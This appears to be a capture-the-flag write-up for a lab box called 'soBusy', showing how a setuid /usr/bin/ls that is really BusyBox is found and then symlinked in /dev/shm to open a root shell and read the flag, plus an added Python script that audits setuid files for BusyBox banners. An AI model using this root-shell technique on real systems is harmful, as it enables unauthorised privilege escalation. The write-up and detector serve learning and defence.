soBusy
Before you start
You can donate to me via Buy Me a Coffee or follow me on Github
Getting the Flag
We find ourselves on a VM, and we know we are inside a Docker container because there is a .dockerenv file at the root of the filesystem.
As with any VM we land on, we start with basic commands to understand what we can do.
Normally we would run linpeas.sh to get a full report of the machine. However, we do not have write permission in the /tmp/ directory, and we cannot execute files we have created.
gcc2024@soBusy:~$ find / -perm /4000 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/ls
/usr/bin/passwd
It is quite odd to see /usr/bin/ls with the SUID bit set, so we run it to see whether we can do something with it.
gcc2024@soBusy:~$ /usr/bin/ls -la /root
total 12
drwx------ 2 root root 4096 Jan 22 12:51 .
drwxr-xr-x 19 root root 4096 Jan 22 12:51 ..
-rw-r--r-- 1 root root 33 Jan 10 2024 flag.txt
Indeed, our ls is SUID, so it runs as root, but only ls itself runs as root, and ls does not let us read files or execute them...
After some thought, I decide to run ls on the file /usr/bin/ls itself, to see whether it is a genuine ls binary or a malicious one.
gcc2024@soBusy:~$ /usr/bin/ls -la /usr/bin/ls
-rwsr-xr-x 1 root root 188584 Jan 10 2024 /usr/bin/ls
As I suspected, we should not trust our first impression: the binary is SUID, but it is not the real ls, because a genuine ls binary has this size:
MisTraleuh@/$ ls -la /bin/ls
-rwsr-sr-x 1 root root 138216 Jan 8 15:56 /usr/bin/ls
By running ls with the --help argument, we get a surprising result:
gcc2024@soBusy:~$ /usr/bin/ls --help
Usage: ls [OPTION]... [FILE]...
Usage: busybox [function [arguments]...]
or: busybox --list
link to busybox for each function they wish to use and BusyBox
[...]
So our ls binary is in reality a busybox binary. BusyBox is a multi-call binary that picks the applet to run from the name it is invoked as (or from its first argument), so through this SUID ls we can run other commands, not just ls.
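As an added example (not the writeup's own code), the following Python script turns the two checks used above, the setuid enumeration with find / -perm /4000 and the BusyBox usage banner, into a repeatable audit: it walks a tree, collects setuid regular files, and flags any that carry the busybox banner or whose size differs from a caller-supplied baseline. The marker strings come from the standard BusyBox help text; the baseline paths and sizes passed to audit() are assumptions for illustration, and on a real host they should come from the package manager (dpkg --verify or rpm -V) rather than from a hand-written table.

```python
#!/usr/bin/env python3
"""Audit setuid binaries for BusyBox-style multi-call executables.

Added example, not the writeup's code. It combines the two observations
from the writeup: `find / -perm /4000` enumerates setuid files, and a
genuine ls does not contain the BusyBox usage banner. The baseline sizes
are an assumption; use the package manager for real verification.
"""
from __future__ import annotations

import os
import stat
from dataclasses import dataclass

# Byte strings present in BusyBox's usage text (see `busybox --help`).
BUSYBOX_MARKERS = (b"busybox [function", b"BusyBox is a multi-call binary")


@dataclass
class Finding:
    path: str
    size: int
    multicall: bool       # file carries the BusyBox banner
    size_mismatch: bool   # size differs from the caller-supplied baseline


def is_setuid(mode: int) -> bool:
    """True if the mode has the set-user-ID bit (same test as -perm /4000)."""
    return bool(mode & stat.S_ISUID)


def looks_like_busybox(path: str, chunk: int = 1 << 20) -> bool:
    """Scan the file for BusyBox markers without loading it all at once."""
    keep = max(len(m) for m in BUSYBOX_MARKERS) - 1
    tail = b""
    with open(path, "rb") as f:
        while True:
            buf = f.read(chunk)
            if not buf:
                return False
            window = tail + buf
            if any(m in window for m in BUSYBOX_MARKERS):
                return True
            tail = window[-keep:]  # a marker split across two chunks still matches


def find_setuid(root: str) -> list[str]:
    """Walk `root` and return regular files with the setuid bit; symlinks are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue  # unreadable or vanished entry, skip it
            if stat.S_ISREG(st.st_mode) and is_setuid(st.st_mode):
                hits.append(p)
    return sorted(hits)


def audit(root: str, baseline_sizes: dict[str, int] | None = None) -> list[Finding]:
    """Setuid bit + BusyBox banner + size check against a baseline keyed by
    path relative to `root` (e.g. "usr/bin/ls"). Baseline values are assumed."""
    baseline_sizes = baseline_sizes or {}
    findings = []
    for p in find_setuid(root):
        size = os.lstat(p).st_size
        expected = baseline_sizes.get(os.path.relpath(p, root))
        findings.append(Finding(
            path=p,
            size=size,
            multicall=looks_like_busybox(p),
            size_mismatch=expected is not None and expected != size,
        ))
    return findings


def suspicious(findings: list[Finding]) -> list[Finding]:
    """Only the findings a reviewer needs to look at."""
    return [f for f in findings if f.multicall or f.size_mismatch]


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for f in suspicious(audit(root)):
        print(f"SUSPICIOUS {f.path} size={f.size} "
              f"busybox={f.multicall} size_mismatch={f.size_mismatch}")
```

Run it as `python3 audit_setuid.py /` on the box; a setuid file that both carries the BusyBox banner and has an unexpected size, like the /usr/bin/ls above, is reported on one line. Symlinks are skipped on purpose because the setuid bit that matters lives on the target file, which is exactly why a symlink in /dev/shm pointing at the SUID binary works.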
As mentioned earlier, the /tmp/ directory is not writable, but /dev/shm is, so we can work from that directory.
gcc2024@soBusy:~$ cd /dev/shm
gcc2024@sobusy:/dev/shm$ ln -s /usr/bin/ls busybox
gcc2024@sobusy:/dev/shm$ ./busybox /bin/sh
root# id
uid=0(root) gid=0(root) groups=0(root)
root# cat /root/flag.txt
GCC{BusyBox_H4s_M0r3_Opti0ns_Th4n_LS}